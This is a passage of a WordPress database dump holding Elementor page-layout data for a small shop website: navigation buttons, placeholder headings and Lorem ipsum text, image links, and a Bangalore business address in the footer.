Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8394,1473,'_elementor_page_assets','a:0:{}'),(8397,1474,'_elementor_edit_mode','builder'),(8398,1474,'_elementor_template_type','wp-page'),(8399,1474,'_elementor_version','3.7.7'),(8400,1474,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (8401,1474,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8402,1474,'_elementor_page_assets','a:0:{}'),(8404,1475,'_elementor_edit_mode','builder'),(8405,1475,'_elementor_template_type','wp-page'),(8406,1475,'_elementor_version','3.7.7'),(8407,1475,'_wp_page_template','elementor_canvas'),(8408,1475,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"},{\"_id\":\"470f418\",\"text\":\"List Item\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"}}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"32\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 